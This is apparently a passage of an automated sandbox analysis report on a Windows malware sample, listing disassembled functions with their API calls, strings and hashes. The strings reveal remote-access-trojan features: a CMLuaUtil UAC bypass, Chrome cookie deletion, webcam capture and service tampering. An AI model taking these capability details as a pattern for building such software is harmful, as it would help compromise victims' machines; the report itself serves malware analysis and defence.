                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                        • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                        • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                        • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                        Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                        • int.LIBCPMT ref: 0040FC0F
                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: p[G
                                        • API String ID: 2536120697-440918510
                                        • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                        • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                        • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                                        • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                        Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                        • _free.LIBCMT ref: 0044FD39
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 0044FD44
                                        • _free.LIBCMT ref: 0044FD4F
                                        • _free.LIBCMT ref: 0044FDA3
                                        • _free.LIBCMT ref: 0044FDAE
                                        • _free.LIBCMT ref: 0044FDB9
                                        • _free.LIBCMT ref: 0044FDC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                        • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                        • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                        Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe), ref: 00406835
                                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                        • CoUninitialize.OLE32 ref: 0040688E
                                        Strings
                                        • [+] before ShellExec, xrefs: 00406856
                                        • [+] ShellExec success, xrefs: 00406873
                                        • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InitializeObjectUninitialize_wcslen
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                        • API String ID: 3851391207-3860793818
                                        • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                        • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                        Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                        • int.LIBCPMT ref: 0040FEF2
                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: h]G
                                        • API String ID: 2536120697-1579725984
                                        • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                        • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                        • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                                        • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                        Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                        • GetLastError.KERNEL32 ref: 0040B2EE
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                        • [Chrome Cookies not found], xrefs: 0040B308
                                        • UserProfile, xrefs: 0040B2B4
                                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        • Opcode ID: 30e5fcbe14093218a38d76bda61cf748b30cc159a0567d7ee95bef924cd16ffd
                                        • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                        • Opcode Fuzzy Hash: 30e5fcbe14093218a38d76bda61cf748b30cc159a0567d7ee95bef924cd16ffd
                                        • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                        Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        • BG, xrefs: 00406909
                                        • Rmc-IUHLZ9, xrefs: 0040693F
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 00406927
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Rmc-IUHLZ9$BG
                                        • API String ID: 0-3797123947
                                        • Opcode ID: d50a95e135f0bfdaf236d1bb78b8391e43d4b57b805b0d92c2bf5032378cfc05
                                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                        • Opcode Fuzzy Hash: d50a95e135f0bfdaf236d1bb78b8391e43d4b57b805b0d92c2bf5032378cfc05
                                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                        Function 00419F42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                        • Sleep.KERNEL32(00002710), ref: 00419F89
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`Wu
                                        • API String ID: 614609389-1738255680
                                        • Opcode ID: 639ba6f34a921cef31bf8efcaa9c44f722cdb1a3cf49c6cc12d230aeec66adff
                                        • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                        • Opcode Fuzzy Hash: 639ba6f34a921cef31bf8efcaa9c44f722cdb1a3cf49c6cc12d230aeec66adff
                                        • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                        Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 00439799
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                        • __allrem.LIBCMT ref: 004397CC
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                        • __allrem.LIBCMT ref: 00439801
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                        • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                        • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                        • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                        Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                        • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                        • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                        • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                        Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                        • API String ID: 3469354165-462540288
                                        • Opcode ID: a5279992c9b5f01cab381193b3706a68732ec19cee183b4c459e27e130619d80
                                        • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                        • Opcode Fuzzy Hash: a5279992c9b5f01cab381193b3706a68732ec19cee183b4c459e27e130619d80
                                        • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                        Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        • Opcode ID: 8d0c32570e89dd068500cd90fe1776a703b3a192111dc2e8c1051611ff5d3692
                                        • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                        • Opcode Fuzzy Hash: 8d0c32570e89dd068500cd90fe1776a703b3a192111dc2e8c1051611ff5d3692
                                        • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                        Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                        • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                        • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                        • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                        Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                        • _free.LIBCMT ref: 00446F06
                                        • _free.LIBCMT ref: 00446F2E
                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                        • _abort.LIBCMT ref: 00446F4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                        • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                        • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                        • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                        Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
